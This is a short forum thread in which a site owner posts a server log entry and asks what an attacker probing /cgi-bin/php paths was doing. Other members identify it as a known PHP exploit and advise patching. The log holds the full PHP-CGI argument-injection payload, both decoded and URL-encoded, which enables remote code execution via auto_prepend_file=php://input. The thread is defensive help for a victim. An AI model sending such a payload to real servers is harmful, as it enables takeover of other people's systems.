Results 1 to 4 of 4

Thread: Looking for someone with PHP and webservers knowledge

  1. #1

    Joined
    Jul 2012
    Posts
    1,888
    Thanks
    1,619
    Thanked
    3,297/1,003
    DL/UL
    223/0
    Mentioned
    469 times
    Time Online
    132d 23h 52m
    Avg. Time Online
    45m

    Looking for someone with PHP and webservers knowledge

    Not programming but maybe here it'll reach people that know about this.

    I have a question.
    Someone's been scaning a webpage for "/cgi-bin/php" "/cgi-bin/php5" and similars and when he finds one that works he sends a POST request with:
    Code:
    -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
    So the log shows this:
    Code:
     "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 200 117 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
    What the fuck is he trying to do?

  2. #2
    Zachafer's Avatar
    Joined
    Dec 2011
    Posts
    1,235
    Userbars
    11
    Thanks
    769
    Thanked
    1,466/678
    DL/UL
    98/0
    Mentioned
    512 times
    Time Online
    24d 13h 9m
    Avg. Time Online
    8m
    That's the Plesk Zero Day exploit. Basically hacker is trying to send commands to PHP CLI. Read more:

    (you need an account to see links)
    (you need an account to see links)

  3. The Following 2 Users Say Thank You to Zachafer For This Useful Post:

    Daviid (10-26-2015),j03 (10-26-2015)

  4. #3
    Saiyan Race
    j03's Avatar
    Joined
    Dec 2011
    Posts
    13,722
    Userbars
    166
    Thanks
    5,907
    Thanked
    33,078/6,609
    DL/UL
    23/36
    Mentioned
    3,867 times
    Time Online
    563d 5h 38m
    Avg. Time Online
    3h 13m
    Quote Originally Posted by Zachafer View Post
    That's the Plesk Zero Day exploit. Basically hacker is trying to send commands to PHP CLI. Read more:

    (you need an account to see links)
    (you need an account to see links)
    Beat me to it.

    A quick Google search of what the IP is requesting and sending will give you this answer.

    (you need an account to see links) stop the attack and patch your server if it is using Linux. @(you need an account to see links)
    (you need an account to see links)
    (you need an account to see links)(you need an account to see links)

    ------------------------
    [02/24/2013] Stealth CORE is made into the first standalone Neopets auto-player.
    ------------------------


  5. The Following User Says Thank You to j03 For This Useful Post:

    Daviid (10-26-2015)

  6. #4

    Joined
    Jul 2012
    Posts
    1,888
    Thanks
    1,619
    Thanked
    3,297/1,003
    DL/UL
    223/0
    Mentioned
    469 times
    Time Online
    132d 23h 52m
    Avg. Time Online
    45m
    Thank you, I'll read through those links. @(you need an account to see links) @(you need an account to see links)

    Sent from my toaster.


    Edit: now they're trying to download a perl script with shellshock modifying the user agent -.-...
    Of course everything is up to date now
    Last edited by Daviid; 10-27-2015 at 05:50 AM.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •